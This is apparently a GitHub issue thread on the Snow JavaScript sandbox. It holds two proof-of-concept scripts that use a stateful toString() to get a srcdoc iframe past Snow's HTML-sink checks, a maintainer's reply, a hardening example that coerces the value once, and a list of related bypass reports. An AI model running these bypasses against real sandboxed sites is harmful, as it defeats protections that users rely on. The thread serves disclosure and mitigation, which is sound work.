Comments (3)
The hook in inserters.js can be bypassed similarly (TOCTOU), to avoid ERR_HTML_FRAMES_SRCDOC_BLOCKED when inserting an HTML string containing an iframe with srcdoc:

```js
before(args); // will operate on <u>legit html!</u>
const ret = Function.prototype.apply.call(native, this, args); // will operate on <iframe id=xxx srcdoc="<iframe>"></iframe>
after(args, element);
```

```js
// Custom element whose toString() answers differently on each call:
// the first ToString (Snow's check) sees benign markup, the second
// (the native insertAdjacentHTML) sees the srcdoc iframe.
class b extends HTMLElement {
  constructor() {
    super();
  }
  fetched = false;
  toString() {
    if (this.fetched) {
      return '<iframe id=xxx srcdoc="<iframe>"></iframe>';
    } else {
      return (this.fetched = '<u>legit html!</u>');
    }
  }
}
customElements.define('x-foo', b);
// Pass the element itself (not a string) to the HTML sink; every ToString re-runs toString().
document.documentElement.insertAdjacentHTML("beforeend", document.createElement('x-foo'));
// Call alert() from the nested srcdoc frame to demonstrate the bypass.
setTimeout(e => { xxx.contentWindow.frames[0].alert(1); }, 1000);
```
from snow.
Thanks for contributing. The main maintainer of this project is temporarily unavailable, but we'll definitely get back to this.
The plan is to tighten some limitations on DOM usage that Snow already introduces and fixing the missing overrides where possible. Some of the work has started (see PR tab)
Meanwhile we're also working with W3C to propose a basic building block of Snow getting introduced into the browser so that all of the monkey-patching can be eliminated in the future. https://www.w3.org/2023/03/secure-the-web-forward/talks/realms.html
Feel free to update this issue with comments on how you think it should be addressed. We may reach out with questions later.
Very nice, very creative and well explained - thank you @avlidienbrunn!
Did some research, not gonna be able to address this atm, leaving some extra conclusions for now:
```js
const a = document.createElement('a');
top.xxx = 0;
// Stateful toString(): benign on the first coercion, srcdoc iframe on the second.
a.toString = () => {
  console.log(top.xxx);
  if (top.xxx === 1) {
    return '<iframe srcdoc="<iframe>"></iframe>';
  }
  top.xxx++;
  return '<legit>xxx</legit>';
};
// A DOM node, not a string, is assigned to the sink.
document.body.innerHTML = a;
setTimeout(() => window[0][0].alert('bypass'), 101);
```
would also work, because snow isn't well prepared for actual DOM nodes passed to HTML sinks...
(AM OPEN FOR MITIGATION IDEAS/THOUGHTS!)
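The two PoCs in this thread share one root cause: the hook coerces the argument once for its check and the native sink coerces it again, so any value with a stateful `toString()` can answer differently each time. The following is an added example, not Snow's code, that models the `before(args) -> native` hook shape quoted in the first comment in plain Node (no DOM) and shows the one-line fix: coerce the markup argument exactly once and hand that same string to the native. `makeNativeSink`, `before`, `wrapVulnerable`, `wrapHardened`, `makeFlipFlop` and `runScenario` are stand-in names chosen here; the real inserters.js differs in detail.

```javascript
// Added example (not Snow's code): models the hook shape from the issue
// and the double-ToString TOCTOU it allows. All names are stand-ins.

// Stand-in for a native HTML sink such as Element.prototype.insertAdjacentHTML.
// Like the real native, it applies ToString to the markup argument itself.
function makeNativeSink(inserted) {
  return function nativeInsertAdjacentHTML(position, html) {
    const markup = `${html}`; // native coercion
    inserted.push({ position, markup });
    return markup;
  };
}

// Stand-in for the "before" policy: refuse iframes carrying srcdoc.
function before(args) {
  const markup = `${args[1]}`; // coercion #1 (the one the check sees)
  if (/<iframe\b[^>]*\ssrcdoc\s*=/i.test(markup)) {
    throw new Error("ERR_HTML_FRAMES_SRCDOC_BLOCKED");
  }
}

// Vulnerable shape: check, then forward the ORIGINAL args. A non-string
// argument is coerced a second time inside the native, so the sink can
// see different markup than the check did (time-of-check / time-of-use).
function wrapVulnerable(native) {
  return function hooked(...args) {
    before(args);
    return Function.prototype.apply.call(native, this, args); // coercion #2
  };
}

// Hardened shape: coerce the markup argument exactly once, run the check on
// that string, and pass the SAME string to the native. toString() is still
// attacker-controlled, but it is consulted only once per call.
function wrapHardened(native) {
  return function hooked(...args) {
    const frozen = args.slice();
    frozen[1] = `${args[1]}`; // single ToString; throws on Symbol, as the native would
    before(frozen);
    return Function.prototype.apply.call(native, this, frozen);
  };
}

// Attacker-controlled value modelled on the PoCs above: benign markup on the
// first ToString, a srcdoc iframe on every later one.
function makeFlipFlop() {
  let calls = 0;
  return {
    toString() {
      calls += 1;
      return calls === 1
        ? "<u>legit html!</u>"
        : '<iframe id=xxx srcdoc="<iframe>"></iframe>';
    },
  };
}

// Drive one wrapper with one payload: report what reached the sink, or that
// the policy rejected the call.
function runScenario(wrap, payload) {
  const inserted = [];
  const sink = wrap(makeNativeSink(inserted));
  try {
    sink("beforeend", payload);
    return { blocked: false, markup: inserted[0].markup };
  } catch (e) {
    return { blocked: true, error: e.message };
  }
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("vulnerable, flip-flop:", runScenario(wrapVulnerable, makeFlipFlop()));
  console.log("hardened, flip-flop:  ", runScenario(wrapHardened, makeFlipFlop()));
  console.log("hardened, plain srcdoc:", runScenario(wrapHardened, '<iframe srcdoc="x"></iframe>'));
}
```

With the vulnerable wrapper the flip-flop object passes the check and the srcdoc iframe reaches the sink; with the hardened wrapper the sink receives exactly the string that was checked (the benign one), and a plain srcdoc string is still rejected by both. In a real hook the coercion has to be applied only to the argument positions (or setter values) that carry markup, and a wrapper that coerces once closes only this double-read channel, not the other bypass classes listed in the related issues.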
Related Issues (20)
- [WIP] How can we steer away from relying on CSP for security?
- Snow can be bypassed with iframes and srcdoc
- Snow can be bypassed with Document.prototype.open
- URL is hooked but webkitURL is not
- Snow can be bypassed with inline script
- Snow can be bypassed with race condition
- Blob validation in Snow can be bypassed with native object copy
- Snow can be bypassed with opener.alert()
- Snow can be bypassed with Prototype Pollution
- Snow can be bypassed with declarative shadow DOM passed as object instead of string
- Snow can be bypassed by polluting NodeList.prototype.length
- Snow can be bypassed with native Prototype Pollution
- Snow can be bypassed with meta and the HTML sanitizer
- Snow can be bypassed with nested cross-origin frames
- Snow can be bypassed with forms and buttons formAction
- Snow can be bypassed with location.replace
- report from twitter
- Snow can be bypassed by creating a Blob URI inside a worker
- Snow can be bypassed using the Response.prototype.blob function